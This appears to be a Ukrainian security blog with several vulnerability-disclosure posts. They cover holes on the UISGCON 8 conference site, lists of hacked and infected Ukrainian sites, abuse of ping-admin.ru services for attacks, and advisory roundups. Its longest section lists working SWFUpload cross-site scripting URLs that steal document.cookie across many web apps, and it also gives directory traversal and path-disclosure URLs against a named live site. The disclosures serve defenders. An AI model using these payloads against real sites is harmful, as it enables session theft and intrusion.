Websecurity - Веб безпека

01.09.2012

У серпні, 16.08.2012, я знайшов численні уразливості на сайті http://www.8.uisgcon.org, зокрема Full path disclosure, Directory Traversal та Cross-Site Scripting уразливості. Про що найближчим часом сповіщу адміністрацію сайта.

Це сайт секюріті конференції UISGCON 8. Торік я виступав з доповіддю на шостій конференції UISG. Якщо сайти сьомої та попередніх конференцій були більш безпечними, то для восьмої організатори вибрали дірявий движок (який прикрасили дірявими плагінами), тому й на сайті багато дірок.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

15.03.2013

Full path disclosure:

http://www.8.uisgcon.org/wp-content/plugins/floating-tweets/dcwp_floating_tweets.php
http://www.8.uisgcon.org/wp-content/plugins/floating-tweets/dcwp_floating_tweets_widget.php
http://www.8.uisgcon.org/wp-content/plugins/floating-tweets/skin.php?skin=1

Directory Traversal (Windows):

http://www.8.uisgcon.org/wp-content/plugins/floating-tweets/skin.php?widget_id=2&skin=11

DT дозволяє зчитувати лише css-файли (в папці /skins/ та підпапках). При відключених mq можна використати Null Byte Injection, що дозволить через DT зчитувати довільні файли.

XSS (persistent XSS):

В даному плагіні три persistent XSS дірки. Приклади експлоітів до Floating Tweets для WordPress.

Окрім вищенаведених, на сайті є ще багато інших дірок. Тільки FPD уразливостей було декілька сотень, про що я приватно повідомив власникам сайта разом з цими дірками.

Власники сайта ламерським чином проігнорували ці уразливості, навіть не відповівши мені. Лише через інших осіб передавши мені, що цим ламєрам, що забивають на безпеку свого секюріті сайта - конференції з інформаційної безпеки - не сподобалось, що я повідомив їм (причому неодноразово) про дірки на їхньому ресурсі. Лише через півроку вони повиправляли всі FPD дірки на сайті, включаючи в плагіні Floating Tweets, але інші дірки в цьому плагіні залишилися не виправленими.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://darg.gov.ua (хакером misafir) - 15.01.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://boguslav-rda.gov.ua (хакером Hmei7) - 16.01.2013 - похаканий державний сайт, на сайті все ще розміщений файл хакера
• http://www.upszn.gov.ua (хакером misafir) - 20.01.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.in.cv.ua (хакерами з Kosova Warriors Group) - 23.02.2013, зараз сайт вже виправлений адмінами
• http://casamia.dp.ua (хакером Hmei7) - 12.03.2013, на сайті все ще розміщений файл хакера

Сайт casamia.dp.ua розміщений на сервері HostPro, де раніше вже відбувся масовий взлом сайтів.

Використання пам’яті після звільнення в Mozilla Firefox, Thunderbird, Seamonkey.

Уразливі продукти: Mozilla Firefox 19.0, Firefox ESR 17.0, Thunderbird 17.0, SeaMonkey 2.16.

Use-after-free уразливість в HTML-редакторі. Дана уразливість була виправлена в Firefox 19.0.2, Firefox ESR 17.0.4, Thunderbird 17.0.4 та SeaMonkey 2.16.1.

• Mozilla Foundation Security Advisory 2013-29 (деталі)

В даній добірці експлоіти в веб додатках:

• Ruby Gem Minimagic Command Execution Vulnerability (деталі)
• Ruby Gem Fastreader 1.0.8 Command Execution Vulnerability (деталі)
• Ruby Gem Curl Command Execution Vulnerability (деталі)
• SafeNet Sentinel Keys Server Crash PoC (деталі)
• Novell Groupwise 8.0.2 HP3 and 2012 Integer Overflow Vulnerability (деталі)

У лютому, 17.02.2013, я знайшов Abuse of Functionality та Insufficient Anti-automation на сайті http://ping-admin.ru. Сервіси цього сайта можуть використовуватися для проведення атак на інші сайти. Про що найближчим часом сповіщу адміністрацію сайта.

Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти. Також я писав про переваги даних атак.

Abuse of Functionality:

Сервіси на сторінках http://ping-admin.ru/free_test/, http://ping-admin.ru/free_ping/, http://ping-admin.ru/free_seo/ можуть використовуватися для атак на інші сайти. Найбільше створють навантаження саме перший і третій сервіси (бо на відміну від пінга, вони викачують з цільового сайта цілу сторінку). А також для проведення DoS атаки на сервери самого сайта.

Insufficient Anti-automation:

У всіх трьох функціоналах немає захисту від автоматизованих запитів (капчі).

Продовжу своє дослідження безпеки e-commerce сайтів в Уанеті.

Веб сайти, що займаються електронною комерцією (e-commerce), повинні дбати про свою безпеку. Бо вони заробляють гроші на своїй онлайн діяльності і будь-які проблеми з безпекою на їх сайтах можуть їм коштувати фінансових втрат.

Але нажаль e-commerce сайти в Уанеті достатньо діряві, бо власники цих сайтів за безпекою особливо не слідкують.

В себе в новинах я писав про уразливості на наступних сайтах електронних платіжних систем, e-commerce та банків (України та Росії):

• www.payu.ua
• www.comdi.com
• jsbni.kiev.ua
• www.forum.ua
• kredobank.com.ua

Також згадував про взломані онлайн магазини в Уанеті:

• www.gemmagee.com.ua
• billiard.co.ua
• ddq.com.ua
• amorphia.com.ua
• festival-shopping.com

А також згадував про інфіковані онлайн магазини в Уанеті:

• digitallworld.com.ua
• x3mal.com.ua
• vse-futbolki.pp.ua
• motormusic.kiev.ua
• aromantica.com.ua
• autopc.com.ua
• vertushka.com.ua
• sloboda.com.ua
• masterphone.com.ua
• priroda.com.ua

Так що українським e-commerce сайтам (та сайтам інших країн) є куди покращувати свою безпеку.

15.02.2013

Виявлені численні уразливості безпеки в Adobe Flash Player.

Уразливі версії: Adobe Flash Player 11.5.

Численні можливості виконання коду, в тому числі ті, що використовуються In-the-wild.

• Security updates available for Adobe Flash Player (деталі)
• Security updates available for Adobe Flash Player (деталі)

13.03.2013

Додаткова інформація.

• Security updates available for Adobe Flash Player (деталі)

В даній добірці уразливості в веб додатках:

• Stack Overflow in DartWebserver.dll <= 1.9 (деталі)
• Multiple Cross-Site Scripting (XSS) in glFusion (деталі)
• Nova vulnerability (деталі)
• Remote Code Execution Vulnerability in MAKETEXT macro (деталі)
• Nova vulnerabilities (деталі)
• nagios metacharacter filtering omission (деталі)
• DataWatch Monarch BI v5.1 admin section reflected cross-site scripting (деталі)
• rubygem-ruby_parser: incorrect temporary file usage (деталі)
• DataWatch Monarch Business Intelligence (BI) v5.1 admin section stored cross-site scripting (деталі)
• Kayako Fusion v4.51.1891 - Multiple Web Vulnerabilities (деталі)

Раніше я писав про Content Spoofing та Cross-Site Scripting уразливості в SWFUpload. Це дуже популярна флешка, що використовується на десятках мільйонів сайтів та в сотнях веб додатків (таких як WordPress, лише один цей веб додаток використовується більше ніж на 62 мільйонах сайтів за даними wordpress.com).

Торік я писав про іншу XSS дірку в SWFUpload і зазначав, що існує багато інших веб додатків з вразливим SWFUpload. Всі вони вразливі до цих нових уразливостей, за виключенням swfupload.swf, що постачається з WordPress починаючи з версії 3.3.2.

Є декілька імен файлів SWFUpload: swfupload.swf, swfupload_f9.swf, swfupload_f8.swf, swfupload_f10.swf і swfupload_f11.swf. Багато веб додатків включають декілька файлів SWFUpload. Не всі ці флешки вразливі до нивих дірок: swfupload_f8.swf і swfupload_f9.swf не вразливі (вони не мають функціоналу buttonText).

Тому з них вразливі наступні веб додатки (та багато інших веб додатків):

swfupload.swf - Dotclear, XenForo, InstantCMS, AionWeb, Dolphin, SwfUploadPanel for TYPO3 CMS, SentinelleOnAir.

swfupload_f10.swf - SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay Portal (Community Edition і Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter, SentinelleOnAir.

swfupload_f11.swf - SentinelleOnAir.

А також вразливий InfoGlue (про XSS уразливість в ZeroClipboard.swf в якому я писав минулого місяця), що також містить SWFUpload.

В SWFUpload є Content Spoofing та Cross-Site Scripting уразливості, як я зазначив у вищезгаданому записі. Це приклади даної XSS уразливості в різних веб додатках.

Cross-Site Scripting (WASC-08):

WordPress:

http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Dotclear:

http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

XenForo:

http://site/js/swfupload/Flash/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

InstantCMS:

http://site/includes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Dolphin:

http://site/plugins/swfupload/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

SwfUploadPanel for TYPO3 CMS:

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Archiv plugin for TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Swfupload for Drupal:

http://site/js/libs/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

SWFUpload for Codeigniter:

http://site/www/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

SentinelleOnAir:

http://site/upload/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/upload/swfupload/swfupload10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/upload/swfupload/swfupload11.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

InfoGlue:

Попередні XSS уразливості:

http://site/webapp/applications/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/webapp/applications/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/webapp/applications/swfupload/swfupload_f9.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Нова XSS уразливість:

http://site/webapp/applications/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Вразливі всі веб додатки з SWFUpload (v2.2.0.1 та попередні версії). Вразливі WordPress 2.7 - 3.3.1, XenForo 1.0.0 - 1.1.2 та потенційно всі версії Dotclear, InstantCMS, AionWeb, Dolphin, SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay Portal (Community Edition, що раніше називався Standard Edition, і Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter та SentinelleOnAir.

Для виправлення уразливості потрібно використати swfupload.swf з WordPress 3.3.2 та наступних версій (в цій флешці були виправлені як попередня XSS, так і ці CS та XSS уразливості).

Продовжуючи розпочату традицію, після попереднього відео про RCE eксплоіт для Internet Explorer, пропоную нове відео на веб секюріті тематику. Цього разу відео про взлом мережі за 60 секунд. Рекомендую подивитися всім хто цікавиться цією темою.

DEFCON 20: Owned in 60 Seconds: From Network Guest to Windows Domain Admin

Торік на конференції DEFCON 20 відбувся виступ Zack Fasel. В своєму виступі він розповів про можливість швидкого захоплення акаунта адміністратора домена Windows. Він розповів про новий інструментарій та нові методи перехоплення мережевих запитів Windows Integrated Authentication.

Зак продемонстрував атаки для захоплення домена Windows (в тому числі через Інтернет) та надав поради для захисту від них. Рекомендую подивитися дане відео для розуміння векторів атак на локальну мережу.